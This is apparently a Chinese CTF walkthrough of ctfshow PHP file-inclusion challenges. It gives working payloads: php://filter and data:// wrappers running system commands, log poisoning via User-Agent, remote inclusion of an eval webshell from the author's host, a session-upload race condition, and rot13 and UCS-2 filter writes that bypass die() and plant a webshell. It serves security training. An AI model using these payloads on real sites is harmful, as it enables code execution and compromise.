ctfshow文件包含

web78 无防护读取源码

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
} 

伪协议读取后base64解密

php://filter/read=convert.base64-encode/resource=flag.php

web79 data协议

 <?php
 if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 

过滤了php,php到是可以用大写绕过,但是文件名flag.php中的php不能大小写,所以用cat这一类的函数,就能避免输入文件名的php。也可以直接base64绕过php

?file=data://text/plain,<?PHP system('tac fl*');?>


?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

web80 input协议

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 

php data被过滤,这里试了以下php://input成功了,看了一下bp,用到了包含日志文件

get:?file=phP://input
post: <?PHP system('tac fl*');?>

通过url或者UA操作后就会在日志中记录,这时再通过包含日志文件达到执行的效果

第一次:User-Agent: <?php system('tac fl*');?>

第二次:?file=/var/log/nginx/access.log

这题也能远程文件包含,上传后可直接蚁剑连接,或者直接命令执行

xxxx为自己网站:?file=http://xxxx/shell.txt
shell.txt中:<?php eval($_POST[1]);?>
1=system('tac f*');

web81 包含日志

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 

多过滤了一个:,这里尝试包含一下日志文件,发现还是可以的,使用上一关的方法

第一次:User-Agent: <?php system('tac fl*');?>

第二次:?file=/var/log/nginx/access.log

多过滤了:,那么 远程文件包含肯定是没希望了

web82 session.upload_progress

新知识点,主要思路是通过上传可控的PHP_SESSION_UPLOAD_PROGRESS临时文件并将其当作跳板来访问/tmp/sess_xxxfreebuf讲解,由于临时文件的原因我们还需要进行条件竞争,可以写脚本,也能直接通过burp来进行爆破攻击。 下面是做题的步骤
先自己搞个网页,修改地址

<!DOCTYPE html>
<html>
<body>
<form action="http://ff1886cd-dda8-48a2-8182-c1b98d685973.challenge.ctf.show:8080" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

在这里插入图片描述

上传后抓包

在这里插入图片描述

这个网页就是我们用来上传临时文件的,接下来我们再通过题目网页来抓一个访问的网页,当然知道临时文件的地址也是利用这个漏洞的一个条件

在这里插入图片描述

上面两个网页搞好之后,就开始同时爆破(intruder),一个用来创建临时文件,一个用来访问,通过这样的条件竞争来达到利用的目的。

在这里插入图片描述

再修改命令进行cat flag
在这里插入图片描述

web83 删除未初始化session
web84 删除所有临时文件后文件包含

只要我爆破的够快,rm就跟不上我

web85 检查< 尖括号
web86 定义了包含路径

web87 rot13

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
    
}else{
    highlight_file(__FILE__);
} 

文件写入,这里可以通过base64或者rot13来绕过,因为题目中存在urldecode,所以需要两个url编码

php://filter/write=string.rot13/resource=1.php 两次url编码
get:?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
<?php system('tac f*');?>
post:content=<?cuc flfgrz('gnp s*');?>

访问1.php,发现成功写入,得到flag,也可base64,但是这个就挺简单的

web88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
} 

没有过滤://,那就直接cat flag

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZionKTs/Pg

web116 foremost分离图片

在这里插入图片描述

用这样的方法将视频另存在桌面上,丢到010里面发现PNG图片前缀,利用foremost将其分离出来

在这里插入图片描述
发现是源代码,前面的一些过滤都没有用,因为有file_get_contents()函数,所以直接读取flag即可,但是这样只能抓包查看

?file=flag.php

?file=compress.zlib:///var/www/html/flag.php

web117 绕过die

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents); 

这里不管传什么都会先出现一个<?php die();?>,所以首先要绕过die(),如果file与contents采用base64,rot13之类的”特殊方式“识别,那么<?php die();?>也会因此被特殊化掉,这样他就失去了他的用处,可这里base与rot都被禁掉了,那么就得采用一些与此类似的东西php支持的字符集编码,这里采用UCS-2LE UCS-2BE:将字符两位两位进行交换

get: ?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
post: contents=?<hp pvela$(P_SO[T]1;)>?

随后直接在a.php页面中传参

get:a.php
post: 1=system('tac f*');
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值